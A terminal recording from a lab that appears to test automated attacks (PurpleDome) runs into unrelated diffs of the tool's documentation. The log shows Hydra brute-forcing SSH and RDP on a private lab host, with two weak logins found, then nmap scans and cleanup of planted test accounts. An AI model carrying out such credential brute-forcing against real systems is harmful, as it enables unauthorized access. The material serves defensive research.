[1144.210193, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n"]
[1144.219171, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n"]
[1144.219851, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n"]
[1144.220367, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n"]
[1144.220713, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n"]
[1144.229099, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n"]
[1144.229789, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n"]
[1144.23002, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n"]
[1144.230646, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n"]
[1144.239324, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n"]
[1144.239896, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n"]
[1144.24068, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n"]
[1144.241006, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"]
[1144.247662, "o", "1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n"]
[1144.255595, "o", "Command exited with status 0.\r\n=== stdout ===\r\nReading package lists...\r\nBuilding dependency tree...\r\nReading state information...\r\nhydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n[22][ssh] host: 192.168.178.145 login: test password: test\r\n[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) fi"]
[1144.255716, "o", "nished at 2021-06-09 02:56:07\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 t"]
[1144.255769, "o", "arget did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not acti"]
[1144.255809, "o", "ve for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty"]
[1144.255849, "o", ", continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389]"]
[1144.25588, "o", "[rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.17"]
[1144.255921, "o", "8.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][r"]
[1144.255953, "o", "dp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing"]
[1144.255987, "o", " attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Us"]
[1144.256016, "o", "e with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] acc"]
[1144.256047, "o", "ount on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account "]
[1144.256075, "o", "not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root passwor"]
[1144.256105, "o", "d: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attac"]
[1144.256136, "o", "king the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, co"]
[1144.256166, "o", "ntinuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: non"]
[1144.256191, "o", "existend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not"]
[1144.256222, "o", " active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"]
[1149.257446, "o", "Attacking machine with PAW: target3 with attack: nmap\r\n"]
[1149.263047, "o", "zsh:cd:1: no such file or directory: None\r\n"]
[1149.290654, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"]
[1149.386065, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"]
[1149.38617, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n"]
[1149.392608, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n"]
[1154.397646, "o", "Attacking machine with PAW: target3 with attack: nmap_stresstest\r\n"]
[1154.404994, "o", "zsh:cd:1: no such file or directory: None\r\n"]
[1154.430451, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"]
[1154.466996, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"]
[1154.467118, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n"]
[1154.474324, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\n"]
[1154.474419, "o", "Debug: Stderr: zsh:cd:1: no such file or directory: None\r\n"]
[1159.477456, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n"]
[1159.69311, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[1169.750938, "o", "Could Not Find C:\\capture\\winidp_data.zip\r\r\n"]
[1169.765534, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nCould Not Find C:\\capture\\winidp_data.zip\r\n\r\nDebug: Stderr: Could Not Find C:\\capture\\winidp_data.zip\r\n"]
[1169.86244, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[1170.144087, "o", " 1 file(s) copied.\r\r\n"]
[1170.158542, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
[1170.216215, "o", "sudo kill -SIGHUP $(pidof -s idpx); while [ ! -f /tmp/idpx.proto ]; do sleep 1; done ; rm ~/idpx\r\n"]
[1171.267669, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[1171.275309, "o", "\u001b[94m Uninstalling vulnerabilities on target2w \u001b[0m\r\n"]
[1171.339028, "o", "The command completed successfully.\r\r\n\r\r\n"]
[1171.356677, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"]
[1171.45084, "o", "The command completed successfully.\r\r\n\r\r\n"]
[1171.473186, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"]
[1171.543427, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
[1171.803471, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
[1172.047409, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
[1172.31145, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
[1172.570747, "o", "The operation completed successfully.\r\r\r\n"]
[1172.583944, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
[1172.807534, "o", "\r\r\nUpdated 3 rule(s).\r\r\n"]
[1172.807667, "o", "Ok.\r\r\n"]
[1172.807739, "o", "\r\r\n"]
[1172.844854, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n\u001b[92m Done uninstalling vulnerabilities on target2w \u001b[0m\r\n\u001b[94m Uninstalling vulnerabilities on target3 \u001b[0m\r\n"]
[1172.862366, "o", "userdel: test mail spool (/var/mail/test) not found\r\n"]
[1172.877426, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: test mail spool (/var/mail/test) not found\r\n\r\nDebug: Stderr: userdel: test mail spool (/var/mail/test) not found\r\n"]
[1172.925985, "o", "userdel: password mail spool (/var/mail/password) not found\r\n"]
[1172.945432, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: password mail spool (/var/mail/password) not found\r\n\r\nDebug: Stderr: userdel: password mail spool (/var/mail/password) not found\r\n"]
[1172.957449, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[1173.009901, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[1173.010037, "o", "\u001b[92m Done uninstalling vulnerabilities on target3 \u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"]
[1176.20632, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: target3 \u001b[0m\r\n"]
[1181.648082, "o", "\u001b[92mMachine stopped: target3\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"]
[1186.901824, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"]
[1186.90263, "o", "Creating zip file loot/2021_06_09___08_38_02/2021_06_09___08_38_02.zip\r\n"]
[1186.931928, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
[1233.852884, "o", "e"]
[1234.124846, "o", "x"]
[1234.380891, "o", "i"]
[1234.556928, "o", "t"]
[1235.261009, "o", "\r\n"]
[1235.261116, "o", "exit\r\n"]

@ -2,7 +2,7 @@
Basics Basics
====== ======
Purple Dome is a simulated and automated environment to play with several operating system attacking each other. Purple Dome is a simulated and automated environment to experiment with several operating system attacking each other.
This tool generates an attacker VM and target VMs. Automated attacks are then run against the targets and they will log system events. Those logs will then be stored away for analysis. This tool generates an attacker VM and target VMs. Automated attacks are then run against the targets and they will log system events. Those logs will then be stored away for analysis.
@ -17,21 +17,21 @@ Features
* VM controller abstracted as plugins * VM controller abstracted as plugins
* Local vagrant based (debug and development) * Local vagrant based (debug and development)
* Cloud based * Cloud based
* Caldera attacks * Attacks as plugins controlling
* Kali attack tools as plugins * Caldera attacks
* Data collection: Attack log and sensor data * Kali attacks
* Metasploit attacks
* Data collection: Attack log and sensor data in parallel with timestamps for matching events
* Vulnerability plugins: Modify the targets before the attack * Vulnerability plugins: Modify the targets before the attack
Components Components
========== ==========
You will interact with the command line tools. Those are described in the *CLI* chapter. The command line tools are the way you will interact with Purple Dome the most. Those are described in the *CLI* chapter.
If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter The experiments are configured in YAML files, the format is described in the *configuration* chapter. You will also want to create some target VMs. You can do this manually or use Vagrant. Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter.
On of the first things you will want to do is configuring the whole thing. Basically you have to touch two things: The configuration file must be modified (in YAML format). And you will also want to create some target VMs. If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter. Thanks to a plugin interface this is quite simple.
Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter.

@ -2,30 +2,20 @@
Configuration Configuration
============= =============
Configuration is contained in yaml files. The example shipped with the code is *experiment.yaml*. Configuration is contained in yaml files. The example shipped with the code is *template.yaml*.
To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. Using Vagrant is optional.
Machines Machines
======== ========
Machines (targets and attacker) are configured in *experiment.yaml*. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it. Machines (targets and attacker) are configured in *experiment.yaml* - the default config file. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it per machine.
If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to it's folder. If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to the folder containing it.
Vagrant machines
~~~~~~~~~~~~~~~~
* vagrantfilepath: Path where the vagrantfile is stored
Communication interfaces
------------------------
SSH SSH
~~~ ---
SSH is the default communication interfaces. For Linux machines it can use vagrant to establish communications (get the keyfile). For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. SSH is the default communication interfaces. If you use Linux and Vagrant Purple Dome can use vagrant to establish SSH communication. For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified.
Attacks Attacks
@ -34,32 +24,23 @@ Attacks
caldera_attacks caldera_attacks
--------------- ---------------
Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es. But to be flexible with targeting the config has separate lists. Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es.
All Caldera abilities are available. But Purple Dome is still missing support for parameters and return values. This can restrict the available abilities at the moment. All Caldera abilities are available. As some will need parameters and Caldera does not offer the option to configure those in the YAML, some caldera attacks might not work without implementing a plugin.
kali_attacks kali_attacks
------------ ------------
Kali attacks are kali commandline tools run by a small piece of python code in Purple Dome. This is the reason why not all Kali functionality is available yet. Kali attacks are kali commandline tools run. Those are executed by specific Purple Dome plugins. Only Kali tools dupported by a plugin are available. You can reference them by the plugin name.
kali_conf kali_conf
--------- ---------
All kali attacks can have a special configuration. The configuration is tool specific. All kali attacks can have a special configuration. The configuration is attack tool specific.
Config file Example config file
=========== ===================
.. autoyaml:: ../template.yaml .. autoyaml:: ../template.yaml
TBD
===
Some features are not implemented yet. They will be added to the config file later
* Terraform
* Separate attack script
* Azure
* Plugin infrastructure (which will change the configuration of plugins, maybe even require splitting and moving configuration around)

@ -7,16 +7,3 @@ Mistakes made/lessons learned
* Caldera server needs golang installed: *sudo apt install golang-go* * Caldera server needs golang installed: *sudo apt install golang-go*
* WinRM ist NOT the way to go. Better use OpenSSH for Windows. * WinRM ist NOT the way to go. Better use OpenSSH for Windows.
Decisions
---------
* Plugins and other things that are relevant for University coop are published here: https://github.com/avast
* Purple Dome Core is internal
* Caldera bugs and similar can and should be fixed in the core project
* What has been named "Victim" so far is better named "Target"
* Running it with Windows VMs is essential. Also install AV
* It is possible that Vagrant + Windows has issues. In that case: Build Windows VMs and create Snapshots. This is why we need a better VM control lib.
* MSDN license is ordered
* We will control the attacks. So we can run this without VMCloak
* Avast seems to be moving those things to AWS. So be ready to move the project there as well.

@ -7,11 +7,10 @@ Windows Vagrant boxes need a special setup. They have to be created from a runni
Windows Box Windows Box
----------- -----------
If you use Vagrant you need a vagrant box first. It is a base image the vm will be based on. If you use Vagrant you need a vagrant box first. On this image the vm will be based on.
The base vm must be running in VirtualBox ! The base vm must be running in VirtualBox when taking the snapshot. To do so, use::
Bash::
vagrant package --base 'Windows 10 x64' vagrant package --base 'Windows 10 x64'
@ -26,8 +25,6 @@ After that it can be used under this name in a Vagrantfile.
Setting up Windows for Purple Dome Setting up Windows for Purple Dome
---------------------------------- ----------------------------------
* Mount the vagrant share to X: (at least my scripts expect it) *net use x:\\vboxsvr\share*
* Create a batch file in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup to automatically start *caldera_agent.bat* in the vagrant share for this machine. This ensures that the caldera agent can be started in reboot
* Install OpenSSH on the windows target (https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_install_firstuse and https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_keymanagement) * Install OpenSSH on the windows target (https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_install_firstuse and https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_keymanagement)
Some SSH hints (powershell): Some SSH hints (powershell):
@ -74,12 +71,12 @@ To connect from linux call bash::
(Capital letters for user name !) (Capital letters for user name !)
* The parameters enforce the use of a specific key. You can also drop that into the ssh config * The parameters enforce the use of a specific key. You can also drop that into the ssh config
Footnote: WinRM failed. I tried. The python code does not support ssh-style "disown". Vagrant files needed a special configuration-and sometimes failed connecting to the windows host properly. Base problem was that it does not properly support empty passwords (not on python, anyway) - and I used them for auto-login. Because some windows versions are a bit tricky with auto-login settings as they should be. Windows 10 is mutating here like hell. Footnote: WinRM failed.
SCP from and to Windows SCP from and to Windows
----------------------- -----------------------
Just use the user's home folder as entry and do:: Just use the user's home folder as "entry folder" and do::
scp win10:my_logs.zip . scp win10:my_logs.zip .

@ -9,9 +9,9 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t
:: ::
Important: We want to improve defense in this project. Adding any attack must be done with this goal. To guarantee that: Important: This projects goal is to improve defense. Adding any attack must be done with this goal. To guarantee that:
* Only add attacks that are already ITW * Only add attacks that are already in the wild
* Link to blog posts describing this attack * Link to blog posts describing this attack
* Maybe already drop some ideas how to detect and block * Maybe already drop some ideas how to detect and block
* Or even add code to detect and block it * Or even add code to detect and block it
@ -19,7 +19,7 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t
Usage Usage
===== =====
To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *AttackPlugin*. To create a new plugin, start a sub-folder in *plugins*. The python file in there must contain a class that inherits from *AttackPlugin*.
There is an example plugin *hydra.py* that you can use as template. There is an example plugin *hydra.py* that you can use as template.
@ -33,31 +33,17 @@ The boilerplate contains some basics:
* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ * ttp: The TTP number of this kali attack. See https://attack.mitre.org/
* references. A list of urls to blog posts or similar describing the attack * references. A list of urls to blog posts or similar describing the attack
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Better than using required_files is to use:
* required_files_attacker: required files to send to the attacker
* required_files_target: required files to send to the target
Method: process_config
----------------------
